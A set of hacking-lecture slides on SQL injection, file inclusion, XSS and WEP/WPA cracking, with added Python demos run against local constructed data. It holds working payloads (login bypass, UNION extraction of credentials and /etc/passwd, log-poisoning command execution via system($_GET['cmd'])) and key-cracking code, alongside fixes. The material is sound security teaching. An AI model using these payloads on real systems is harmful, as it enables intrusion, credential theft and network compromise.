5. IPSECS
Web Exploitation
• Exploiting programming flaws in web applications.
• Programming mistakes always happen.
• Targets either the client or the server.
• Possible outcomes: stealing databases and other sensitive information, stealing cookies or sessions, executing arbitrary commands, or fully compromising the system.
• It's easy to do. Google helps you :).
www.ipsecs.com
6. IPSECS
Common Web Exploitation
• SQL Injection, an attack targeting sensitive information in the database server. Can lead to full system compromise.
• File Inclusion, an attack usually used to gain shell access on the remote target.
– Local file inclusion
– Remote file inclusion
• Cross Site Scripting (XSS), an attack targeting the users (clients) of a vulnerable website.
– DOM-based
– Persistent
– Non-persistent
8. IPSECS
SQL Injection
• Injecting malicious SQL into the application's query for the attacker's benefit.
• Usually used to bypass a login or to steal sensitive information from the database. Further attacks can lead to full system compromise.
• Root cause: user input is not validated or sanitised before being concatenated into the query.
• All examples and demos below are PHP with MySQL.
9. IPSECS
SQL Injection in login form
• User input from the login form is not validated before it is used in the database query.
• An attacker can send arbitrary SQL through the login form and bypass the login process.
• The attacker can also execute other SQL queries.
10. IPSECS
Vulnerable Code
• Example vulnerable code in a login process:
$pass = md5($_POST['password']);
$query = "SELECT * FROM tblUser WHERE username = '" .
$_POST['username'] . "' AND password = '" . $pass . "'";
$q = mysql_query($query);
• The username sent from the login form is concatenated into the query without validation or escaping (the password is hashed first, so it is not injectable here; the unsalted MD5 is a separate weakness).
11. IPSECS
Exploit Login
• Exploit input:
username = admin' OR 'a'='a
password = terserah
• The SQL query executed by the database server is:
SELECT * FROM tblUser WHERE username = 'admin' OR 'a'='a'
AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
12. IPSECS
SQL Injection in login form
13. IPSECS
SQL Logic
• AND binds tighter than OR, so the WHERE clause is evaluated as:
username = 'admin' OR ('a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47')
• The bracketed part is FALSE (the hash does not match), so for the admin row the condition reduces to:
username = 'admin' OR FALSE
• Which is TRUE for the admin row, so that row is returned.
• The attacker has bypassed the login form.
• Note that this particular payload only works because a user named admin exists; the 'a'='a' part just keeps the quotes balanced. The payload ' OR 1=1 -- returns the first row regardless of the username.
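The login bypass above, replayed end to end. This is an added example and not code from the original slides: SQLite stands in for PHP/MySQL (the query text is the same), the tblUser rows and password values are constructed, and the comment payload goes one step beyond the slide to show a bypass that does not depend on the username existing. The fixed variant uses bound parameters, which is the actual remediation.

```python
"""SQL injection login bypass from the slides, replayed against SQLite.
Added example, not from the original slides; table contents are constructed."""
import hashlib
import sqlite3


def make_db():
    """Constructed stand-in for the tblUser table of the slides."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblUser (username TEXT, password TEXT, namaLengkap TEXT)")
    db.executemany("INSERT INTO tblUser VALUES (?, ?, ?)", [
        ("admin", hashlib.md5(b"s3cret-admin").hexdigest(), "Administrator"),
        ("alice", hashlib.md5(b"alice-pw").hexdigest(), "Alice"),
    ])
    return db


def login_vulnerable(db, username, password):
    """Mirrors the slide's PHP: the username is concatenated straight into the SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    query = ("SELECT username FROM tblUser WHERE username = '" + username
             + "' AND password = '" + pw_hash + "'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Same query with bound parameters: the username is always data, never SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = db.execute(
        "SELECT username FROM tblUser WHERE username = ? AND password = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


def demo():
    db = make_db()
    payload = "admin' OR 'a'='a"          # the slide's payload; password does not matter
    return {
        # admin' OR ('a'='a' AND password='...') is TRUE for the admin row
        "vulnerable": login_vulnerable(db, payload, "terserah"),
        # same input, bound as a parameter: no user is literally named "admin' OR 'a'='a"
        "fixed": login_fixed(db, payload, "terserah"),
        # the slide's payload needs the named user to exist; 'root' does not
        "nonexistent_user": login_vulnerable(db, "root' OR 'a'='a", "terserah"),
        # -- comments out the password check entirely, so the first row comes back
        "comment_out": login_vulnerable(db, "' OR 1=1 -- ", "x"),
        # the fixed code still lets a legitimate user in
        "legit": login_fixed(db, "alice", "alice-pw"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The MD5 hashing is kept only to mirror the slide; bound parameters fix the injection regardless of how the password is stored.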
14. IPSECS
SQL Injection in URI parameter
• A parameter from the URI is not validated before it is used in the database query.
• An attacker can send arbitrary SQL by modifying the parameter.
15. IPSECS
Vulnerable Code
• Example vulnerable code handling a URI parameter:
$query = "SELECT * FROM news WHERE id=" . $_GET['aid'] ;
$q = mysql_query($query);
• Parameter 'aid', taken from the URI, is not validated. It is used in an integer context (no quotes around it), so the attacker does not even need a quote character to break out.
16. IPSECS
Exploiting SQL Injection
• Check for injection with a boolean condition: the first URL must return the article, the second must not (blank or different page):
http://example.com/news.php?aid=1 AND 1=1--
http://example.com/news.php?aid=1 AND 1=0--
• Find the number of columns with UNION SELECT, adding one column at a time until the error disappears (the UNION must have the same column count as the original query):
http://example.com/news.php?aid=1 UNION SELECT 1--
http://example.com/news.php?aid=1 UNION SELECT 1,2--
http://example.com/news.php?aid=1 UNION SELECT 1,2,3,..,n--
• Note: MySQL only treats -- as a comment when it is followed by whitespace, so in a URL write --+ or -- - (or %23 for #).
18. IPSECS
SQL Injection in URI parameter
• In this demo the query behind "news" returns 3 columns, so UNION SELECT 1,2,3 is the one that succeeds.
19. IPSECS
Exploiting SQL Injection
• aid=-1 matches no real row, so the page renders only the row added by the UNION; GROUP_CONCAT packs many results into the one visible column.
• Listing the tables in the current database:
http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--
• Listing the columns of table 'tblUser':
http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='tblUser'--
or, with the table name as a hex literal (no quotes needed, which helps when quotes are filtered or escaped; 0x74626c55736572 is 'tblUser'):
http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x74626c55736572--
21. IPSECS
Exploiting SQL Injection
• Reading rows from a table (CONCAT_WS with separator 0x2c, a comma, joins the three columns into one value):
http://example.com/news.php?aid=-1 UNION SELECT 1,2,CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser--
• Reading arbitrary files from the server's filesystem, if the database user has the FILE privilege (and secure_file_priv does not restrict the path):
http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
or, with the path as a hex literal (0x2f6574632f706173737764 is '/etc/passwd'):
http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(0x2f6574632f706173737764)--
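The UNION-based procedure of the last few slides (boolean check, column-count discovery, schema and data extraction) run as a script against a local database. This is an added example, not code from the original slides: SQLite stands in for MySQL, so sqlite_master and pragma_table_info play the role of information_schema and group_concat() that of GROUP_CONCAT(); the news and tblUser tables and their rows are constructed. The injection mechanics (integer context, aid=-1, column matching, trailing comment) are identical.

```python
"""UNION-based SQL injection, replayed against SQLite (added example; not from the
original slides; SQLite stands in for MySQL and the table contents are constructed)."""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'Hello', 'first post')")
    db.execute("CREATE TABLE tblUser (username TEXT, password TEXT, namaLengkap TEXT)")
    db.execute("INSERT INTO tblUser VALUES "
               "('admin', 'e00b29d5b34c3f78df09d45921c9ec47', 'Site Admin')")
    return db


def news_page(db, aid):
    """Mirrors the slide's PHP: 'aid' is concatenated into an integer context.
    Returns the rows the page would render, or None when the query errored
    (the blank page an attacker observes)."""
    try:
        return db.execute("SELECT * FROM news WHERE id=" + aid).fetchall()
    except sqlite3.Error:
        return None


def boolean_test(db):
    """Step 1: AND 1=1 keeps the article, AND 1=0 removes it -> input reaches SQL."""
    return news_page(db, "1 AND 1=1--") != [] and news_page(db, "1 AND 1=0--") == []


def find_column_count(db, limit=20):
    """Step 2: grow UNION SELECT 1,2,...,n until the column counts match (no error)."""
    for n in range(1, limit + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        if news_page(db, f"1 UNION SELECT {cols}--") is not None:
            return n
    return None


def union_extract(db, expression, ncols):
    """Step 3: aid=-1 matches no real row, so only the UNION row is rendered; the
    expression goes into the last column, which this page displays."""
    cols = ",".join(str(i) for i in range(1, ncols)) + "," + expression
    rows = news_page(db, f"-1 UNION SELECT {cols}--")
    return rows[0][-1] if rows else None


def demo():
    db = make_db()
    n = find_column_count(db)
    # MySQL: GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()
    tables = union_extract(db, "group_concat(name) FROM sqlite_master WHERE type='table'", n)
    # MySQL: GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='tblUser'
    columns = union_extract(db, "group_concat(name) FROM pragma_table_info('tblUser')", n)
    # MySQL: CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser
    creds = union_extract(
        db, "group_concat(username || ',' || password || ',' || namaLengkap) FROM tblUser", n)
    return boolean_test(db), n, tables, columns, creds


if __name__ == "__main__":
    injectable, ncols, tables, columns, creds = demo()
    print("injectable:", injectable, "columns:", ncols)
    print("tables:", tables)
    print("tblUser columns:", columns)
    print("rows:", creds)
```

The same three steps are what sqlmap automates; the manual version is worth understanding because the error-versus-no-error signal in find_column_count is exactly what breaks when an application hides database errors, which is why blind techniques exist.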
24. IPSECS
File Inclusion
• Making the server include, and therefore execute or display, a malicious or sensitive file.
• Usually used to steal sensitive information, execute arbitrary commands, or compromise the system.
• Root cause: user input is not validated or sanitised before being used as a file path.
• All examples and demos below are in PHP.
25. IPSECS
Local File Inclusion
• Including a sensitive file that already exists on the local (vulnerable) server, so that the server reads or executes it.
• Usually used to steal sensitive information or execute arbitrary commands. Further attacks can fully compromise the system.
• User input is not validated or sanitised.
26. IPSECS
Vulnerable Code
• Example vulnerable code:
define('DOCROOT', '/var/www/html/modules');
$filename = DOCROOT . "/" . $_GET['module'] . ".php";
include($filename);
• Parameter 'module', taken from the URI, is not validated: ../ sequences walk out of DOCROOT. Because ".php" is appended, the attacker also needs a way to cut the string off (the null byte on the next slide).
27. IPSECS
Viewing Sensitive Files
• Exploit URLs to view sensitive files on the vulnerable system:
http://example.com/index.php?module=../../../../../../../etc/passwd%00
http://example.com/index.php?module=../../../../../../../etc/group%00
• The ../ sequences walk up to the filesystem root (extra ones are harmless); %00 is a NUL byte that truncates the path so the appended ".php" is ignored. This only works in PHP before 5.3.4 (and with magic_quotes_gpc off); later versions reject paths containing NUL.
31. IPSECS
Executing Command
• Executing commands via the Apache access_log, if the log is readable by the web server user and the attacker has first "poisoned" it: a request whose User-Agent (or URL) contains PHP code such as <?php system($_GET['cmd']); ?> gets written to the log, and including the log then executes that code with the cmd parameter:
http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=uname -a
http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=id
• The log path depends on the installation (e.g. /var/log/apache2/access.log on Debian/Ubuntu).
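The path handling behind the last three slides, modelled in Python. This is an added example and not code from the original slides: it reproduces the slide's DOCROOT . "/" . $_GET['module'] . ".php" construction, emulates the NUL-byte truncation of old PHP, and puts a hardened version (allowlist plus normalised-path check) next to it. The docroot and module names are constructed and nothing is read from disk; paths are handled as POSIX strings so the result is the same on any platform.

```python
"""Local file inclusion: vulnerable path construction versus a hardened lookup.
Added example, not from the original slides; DOCROOT and the allowlist are constructed."""
import posixpath

DOCROOT = "/var/www/html/modules"
ALLOWED_MODULES = {"news", "login", "search"}     # constructed allowlist


def php_truncate_at_null(path):
    """PHP before 5.3.4 handed the string to the C open(), which stops at the first
    NUL byte; that is what the %00 in the slide's URLs relies on."""
    return path.split("\x00", 1)[0]


def vulnerable_include_target(module):
    """Mirrors the slide: DOCROOT . "/" . $_GET['module'] . ".php", no validation."""
    return php_truncate_at_null(DOCROOT + "/" + module + ".php")


def hardened_include_target(module):
    """Allowlist first; as defence in depth also refuse anything that resolves outside
    DOCROOT after normalisation. Returns None when the request is rejected."""
    if module not in ALLOWED_MODULES:
        return None
    path = posixpath.normpath(posixpath.join(DOCROOT, module + ".php"))
    if posixpath.commonpath([DOCROOT, path]) != DOCROOT:
        return None
    return path


def classify(module):
    """What each version of the code would open for a given 'module' parameter."""
    resolved = posixpath.normpath(vulnerable_include_target(module))
    return {
        "vulnerable_opens": resolved,
        "escapes_docroot": posixpath.commonpath([DOCROOT, resolved]) != DOCROOT,
        "hardened_opens": hardened_include_target(module),
    }


if __name__ == "__main__":
    for m in ["news",
              "../../../../../../../etc/passwd\x00",      # slide's payload, old PHP
              "../../../../../../../etc/passwd",          # same without the NUL byte
              "../../../../../../../usr/local/apache/logs/access_log\x00"]:
        print(repr(m), classify(m))
```

Without the NUL byte the vulnerable code still escapes the docroot but opens /etc/passwd.php, which does not exist; that is why the %00 mattered on old PHP and why, on current PHP, an attacker looks for includable files that already end in .php or for wrappers instead. The allowlist makes the question moot.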
33. IPSECS
Remote File Inclusion
• Including a file hosted on a remote server (the attacker's) so that the vulnerable server executes it.
• Usually used to run a web shell and execute arbitrary commands. Further attacks can fully compromise the system.
• User input is not validated or sanitised.
• Requires allow_url_include=On in php.ini (off by default since PHP 5.2); otherwise include() refuses URLs.
34. IPSECS
Vulnerable Code
• Example vulnerable code:
$filename = $_GET['page'] . ".php";
include($filename);
• Parameter 'page', taken from the URI, is not validated, and there is no fixed directory prefix, so an http:// URL goes straight into include().
• The appended ".php" can be neutralised with a trailing ? (it then becomes the query string of the remote URL) or with %00 on old PHP versions.
41. IPSECS
Cross Site Scripting
• Injecting HTML/JavaScript code that is executed by the browser of a client viewing the vulnerable website.
• Usually used to steal cookies from the client's computer, for phishing, or to trick the user into downloading an arbitrary file.
• User input is not validated or sanitised, and is echoed into the page without output encoding.
• All examples and demos below are in PHP.
42. IPSECS
Cross Site Scripting
• DOM-based XSS: the vulnerable code is client-side JavaScript that writes attacker-controlled data (e.g. from the URL fragment or a query parameter) into the DOM; the payload need not pass through the server at all.
• Non-persistent (reflected) XSS: the server echoes a request parameter into the page; exploited by tricking the user into clicking a malicious URI. Characteristic: temporary.
• Persistent (stored) XSS: the malicious code is saved into the database (comment, profile, post) and served to every visitor of the page. Characteristic: permanent.
43. IPSECS
Vulnerable Code
• Example vulnerable code:
echo "<pre> Searching for " . $_GET['key'] . "...</pre><br/>\n";
• Parameter 'key', sent from the search form, is echoed without validation or output encoding (htmlspecialchars).
44. IPSECS
Cross Site Scripting
• Checking whether the page is vulnerable to XSS:
http://example.com/search.php?key=<script>alert('XSS found dude!')</script>
• If the browser shows the alert box, the input is being rendered as markup rather than as text.
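The reflected XSS above, rendered both the vulnerable way and with output encoding, with a parser standing in for the browser to show which tags the injected input creates. This is an added example, not code from the original slides: the page template (the search form plus the slide's <pre> line), the probe strings and the attribute-context payload are constructed; html.escape plays the role of PHP's htmlspecialchars($key, ENT_QUOTES). It goes one step beyond the slide by also reflecting the term inside an attribute, where a payload without any <script> tag still executes.

```python
"""Reflected XSS: vulnerable echo versus escaped output, checked with an HTML parser.
Added example, not from the original slides; template and probes are constructed."""
import html
from html.parser import HTMLParser


def render_vulnerable(key):
    """Mirrors the slide: the search term is concatenated raw, here in two contexts
    (an attribute value in the form and the text of the <pre> line)."""
    return ('<form><input name="key" value="' + key + '"></form>\n'
            '<pre> Searching for ' + key + '...</pre><br/>\n')


def render_fixed(key):
    """Equivalent of htmlspecialchars($key, ENT_QUOTES): <, >, &, " and ' are encoded,
    so the term can only ever be text, in both contexts."""
    safe = html.escape(key, quote=True)
    return ('<form><input name="key" value="' + safe + '"></form>\n'
            '<pre> Searching for ' + safe + '...</pre><br/>\n')


class TagCollector(HTMLParser):
    """Records every start tag with its attribute names, roughly what the browser builds."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, sorted(name for name, _ in attrs)))


def parsed_tags(page):
    collector = TagCollector()
    collector.feed(page)
    return collector.tags


def injected_markup(render, key):
    """Tags (or extra attributes) present with this key that the template alone lacks."""
    baseline = parsed_tags(render(""))
    return [t for t in parsed_tags(render(key)) if t not in baseline]


PROBE = "<script>alert('XSS found dude!')</script>"   # the slide's probe
ATTR_PROBE = '" autofocus onfocus="alert(1)'          # no <script>, still executes

if __name__ == "__main__":
    for name, probe in [("script probe", PROBE), ("attribute probe", ATTR_PROBE)]:
        print(name, "vulnerable ->", injected_markup(render_vulnerable, probe))
        print(name, "fixed      ->", injected_markup(render_fixed, probe))
```

The attribute probe is why filtering for the string "<script" is not a fix: the only reliable defence is encoding for the context the value lands in (here HTML text and a quoted attribute, which htmlspecialchars with ENT_QUOTES covers; JavaScript or URL contexts need their own encoders).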
52. IPSECS
Wireless Network
• Now widely used on campuses, in government, in companies, and in many public places.
• Provides network access for mobile devices.
• More flexible than a wired network.
• Less secure than a wired network, so here we go!
53. IPSECS
War Driving
• Searching for Wi-Fi wireless networks, typically while moving around with a laptop and a wireless card.
• Public tools for war driving:
– Windows: NetStumbler, Wireshark
– Linux: Kismet, Aircrack-ng, AirSnort, Wireshark
– OSX: KisMac
• I'm using Linux Ubuntu 8.10.
54. IPSECS
Kismet
• Console-based 802.11 wireless network detector and sniffer.
• It identifies wireless networks by passive sniffing, so it also finds networks that do not broadcast their SSID.
• It is in the Ubuntu repository, or you can download it from www.kismetwireless.net.
• Use 'apt-get install kismet' on Ubuntu; read the README if you want to install from source.
58. IPSECS
AirSnort
• GUI-based 802.11 wireless network detector.
• Designed as a WEP cracker.
• It isn't in my Ubuntu repository; download it from www.sourceforge.net.
• Read the README to install.
59. IPSECS
aircrack-ng (formerly: aircrack)
• Console-based 802.11 wireless network detector and attack suite.
• Designed for WEP and WPA-PSK cracking.
• It is in the Ubuntu repository, or you can download it from www.aircrack-ng.org.
• Use 'apt-get install aircrack-ng' on Ubuntu; read the README if you want to install from source.
61. IPSECS
Wireshark
• GUI-based network protocol analyzer for UNIX and Windows.
• The most complete protocol analyzer, with dissectors for a very large number of data communication protocols.
• It is in the Ubuntu repository, or you can download it from www.wireshark.org.
• Use 'apt-get install wireshark' on Ubuntu; read the README if you want to install from source.
63. IPSECS
NetStumbler
• Best-known Windows tool for finding wireless networks.
• It functions like Kismet on Linux or KisMac on OSX.
• You can download NetStumbler from www.netstumbler.com
• Since I use Ubuntu, there's no demo of this tool.
66. IPSECS
Exploiting Wireless Networks
• Misconfiguration (human error)
• Spoofing
• Cracking the protection (WEP/WPA)
• Denial of service
67. IPSECS
Misconfiguration
• Default configuration on the device (access point)
• Default username and password
• Default IP address range
• SNMP with the default 'public' and 'private' community strings
• No encryption enabled
68. IPSECS
Spoofing & Rogue AP
• Spoofing the MAC address to bypass MAC filtering (a permitted client's MAC is visible in clear in captured frames).
• Tools
– Linux: ifconfig (hw ether)
– Windows: SMAC, regedit
• Creating a rogue AP with the same SSID to lure wireless users, then performing a man-in-the-middle attack and sniffing their traffic.
• Tools
– airsnarf http://airsnarf.shmoo.com
70. IPSECS
WEP Cracking
• WEP is based on the RC4 stream cipher and a CRC32 integrity check; the per-packet key is a 24-bit IV (Initialization Vector) prepended to the shared key, and the IV is sent in clear with every frame.
• Collect as many weak IVs as possible for the FMS (Fluhrer, Mantin, Shamir) attack, which recovers the key byte by byte statistically.
• Speed up IV collection with traffic injection (replaying captured ARP requests so the AP produces new encrypted frames).
• Tools: aircrack-ng, AirSnort
• Note: aircrack-ng's default PTW attack (since version 0.9) no longer depends on weak IVs and needs far fewer frames, but the principle, statistics on the IV and first keystream byte, is the same.
71. IPSECS
WEP Cracking
• Put the interface into monitor mode (airmon-ng).
• Run kismet to find the target AP.
• Find an AP with clients connected to it, or do fake authentication (aireplay-ng) to associate with the AP if no client is connected.
• Capture packets with airodump-ng, writing them to a file.
• Inject packets with aireplay-ng (ARP replay) to generate traffic, and therefore IVs, quickly.
• Crack the capture file with aircrack-ng.
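What aircrack-ng does in the last step, for the classic FMS attack the previous slide describes, in runnable form. This is an added example and not code from the original slides or from aircrack-ng: it implements RC4, a WEP-style encryption of constructed frames under a constructed 40-bit key, and the FMS weak-IV vote that recovers the key one byte at a time. The capture is constructed to contain one frame for every IV of the FMS form (A+3, 255, X); a real capture would need ARP replay to accumulate enough of them. The key-ID byte and CRC32 ICV of real frames are left out since FMS does not use them; what it does use is that every WEP data frame begins with the LLC/SNAP header aa aa 03 00 00 00, which gives away the first keystream byte.

```python
"""FMS weak-IV attack on a simulated WEP capture. Added example; not from the original
slides or aircrack-ng. Key, frames and payload are constructed."""
from collections import Counter

SNAP_HEADER = bytes.fromhex("aaaa03000000")   # first plaintext bytes of any WEP data frame


def ksa(key, steps=256):
    """RC4 key scheduling. steps < 256 runs only the prefix of the schedule that depends
    on bytes the attacker already knows (the IV plus recovered key bytes)."""
    s = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s, j


def rc4_keystream(key, n):
    s, _ = ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def wep_encrypt(secret, iv, plaintext):
    """WEP per-packet key is IV || secret; the IV travels in clear in front of the body."""
    ks = rc4_keystream(iv + secret, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def is_fms_weak_iv(iv, key_index):
    """IVs of the form (key_index+3, 255, X) leak secret byte key_index (FMS, 2001)."""
    return iv[0] == key_index + 3 and iv[1] == 255


def fms_votes(frames, known_secret):
    """One vote per usable weak frame for the next secret byte after known_secret.
    Roughly 5% of the votes are right and the rest are spread out, so the true byte
    wins clearly once a few hundred weak IVs have been seen."""
    a = len(known_secret)
    votes = Counter()
    for frame in frames:
        iv, c0 = frame[:3], frame[3]
        if not is_fms_weak_iv(iv, a):
            continue
        s, j = ksa(iv + known_secret, steps=a + 3)            # known part of the schedule
        if s[1] >= a + 3 or (s[1] + s[s[1]]) % 256 != a + 3:    # state must be 'resolved'
            continue
        z = c0 ^ SNAP_HEADER[0]                                # first keystream byte
        votes[(s.index(z) - j - s[a + 3]) % 256] += 1          # K[a+3] = S^-1[z] - j - S[a+3]
    return votes


def recover_key(frames, key_len=5, fudge=3):
    """Depth-first over the `fudge` best-voted candidates per byte (aircrack-ng's 'fudge
    factor'), confirming a full key by decrypting the first frame's SNAP header."""
    iv0, body0 = frames[0][:3], frames[0][3:3 + len(SNAP_HEADER)]

    def is_correct(secret):
        ks = rc4_keystream(iv0 + secret, len(SNAP_HEADER))
        return bytes(c ^ k for c, k in zip(body0, ks)) == SNAP_HEADER

    def search(prefix):
        if len(prefix) == key_len:
            return prefix if is_correct(prefix) else None
        for byte, _ in fms_votes(frames, prefix).most_common(fudge):
            found = search(prefix + bytes([byte]))
            if found is not None:
                return found
        return None

    return search(b"")


SECRET = bytes.fromhex("0badc0ffee")    # constructed 40-bit WEP key, not a real network


def build_capture(secret, key_len=5):
    """Constructed capture: one frame per FMS weak IV, as airodump-ng would have saved them."""
    plaintext = SNAP_HEADER + b"constructed payload"
    return [wep_encrypt(secret, bytes([a + 3, 255, x]), plaintext)
            for a in range(key_len) for x in range(256)]


if __name__ == "__main__":
    print("recovered key:", recover_key(build_capture(SECRET)).hex())
```

The weak-IV filter is why old WEP attacks needed hundreds of thousands of frames: only 256 IVs per key byte out of 2^24 are usable by FMS. Vendors responded by skipping those IVs, which is what pushed the tools to KoreK and then PTW statistics that use all IVs.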
74. IPSECS
WPA Cracking
• WPA uses RC4 with TKIP (per-packet keys and a message integrity check); WPA2 uses AES (CCMP).
• WPA-PSK and WPA2-PSK can be attacked with a dictionary attack on the captured 4-way handshake, because the pairwise master key is derived only from the passphrase and the SSID.
• Of course, it needs a dictionary (wordlist); a passphrase that is not in the list will not be found.
• The cracking is done offline, with no further traffic to the network.
• Tools: aircrack-ng
75. IPSECS
WPA Cracking
• Put the interface into monitor mode.
• Run kismet to find the target AP.
• Find an AP that is protected by WPA.
• Capture packets with airodump-ng, writing them to a file.
• Wait for a client to authenticate to the AP, or deauthenticate a connected client (aireplay-ng) so that it reconnects and the 4-way handshake is captured.
• Crack the capture file with aircrack-ng and a wordlist.
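The offline step of the WPA procedure above, in runnable form. This is an added example and not code from the original slides or from aircrack-ng: the AP and client MAC addresses, the nonces, the EAPOL frame bytes, the wordlist and the passphrase are all constructed, while the derivation is the standard one (PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes); PTK = PRF-512(PMK, "Pairwise key expansion", MACs and nonces); MIC = first 16 bytes of HMAC-SHA1(KCK, EAPOL frame with the MIC field zeroed), which is the WPA2-CCMP variant; WPA-TKIP uses HMAC-MD5 for the MIC instead). Everything the attacker needs except the passphrase is visible in the captured handshake.

```python
"""Offline dictionary attack on a captured WPA2-PSK 4-way handshake. Added example;
not from the original slides or aircrack-ng. Handshake values are constructed."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32); 4096 rounds per guess is
    what makes WPA-PSK cracking slow and SSID-specific rainbow tables attractive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    Only the first 16 bytes (the KCK) are needed to check the handshake MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]


def eapol_mic(kck, eapol_frame):
    """Key descriptor version 2 (CCMP): HMAC-SHA1 over the frame, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_handshake(passphrase, ssid):
    """Constructed stand-in for what airodump-ng captures: everything here except the
    passphrase is transmitted in clear during the 4-way handshake."""
    ap_mac, sta_mac = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd")
    anonce = hashlib.sha256(b"constructed ANonce").digest()
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    # Stand-in bytes for EAPOL-Key message 2 with its 16-byte MIC field zeroed; the
    # attack only needs the exact bytes the client signed, not their meaning.
    eapol = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(8) + snonce + bytes(32)
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(ptk[:16], eapol)}


def crack_psk(hs, wordlist):
    """aircrack-ng's inner loop: derive PMK -> PTK -> MIC per candidate, compare."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        ptk = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), hs["mic"]):
            return candidate
    return None


WORDLIST = ["password", "12345678", "letmein!", "ipsecs2009", "correct horse", "qwertyuiop"]
HANDSHAKE = build_handshake("ipsecs2009", "constructed-ssid")   # constructed passphrase

if __name__ == "__main__":
    print("passphrase:", crack_psk(HANDSHAKE, WORDLIST))
```

Because the SSID is the PBKDF2 salt, precomputed PMK tables only help against common SSIDs; a unique SSID plus a passphrase that is not in any wordlist leaves the attacker with 4096 SHA-1 rounds per guess and nothing else.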